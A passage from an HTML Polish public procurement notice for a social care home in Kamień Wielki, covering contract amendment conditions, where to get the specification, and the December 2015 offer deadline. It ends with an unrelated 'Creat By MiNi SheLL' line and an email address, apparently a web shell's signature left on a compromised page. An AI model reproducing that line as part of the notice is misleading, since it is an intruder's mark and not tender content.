- w pozostałym zakresie - w sytuacji nieprzewidzianej i niezawinionej przez strony, której wystąpienie strony nie mogły przewidzieć pomimo zachowania należytej staranności;
- w przypadku zdarzeń losowych trudnych do przewidzenia (zdarzenie losowe trudne do przewidzenia lub połączenie zdarzeń obiektywnie niezależnych od Stron, które zasadniczo utrudniają wykonywanie części lub całości zobowiązań wynikających z umowy, których Strony nie mogły przewidzieć i którym nie mogły zapobiec ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych) możliwa jest zmiana postanowień umowy w tym zmiana terminu realizacji przedmiotu umowy, wymaga to jednak zgody obu stron umowy.
Zmiany umowy, o których mowa wyżej, oprócz zmiany stawki Vat, nie mogą powodować zwiększenia wartości umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www. bip.wrota.lubuskie.pl/dpskamien/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Kamieniu Wielkim, ul. Stawna 40, 66-460 Witnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.12.2015 godzina 09:00, miejsce: Dom Pomocy Społecznej w Kamieniu Wielkim, ul. Stawna 40, 66-460 Witnica.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com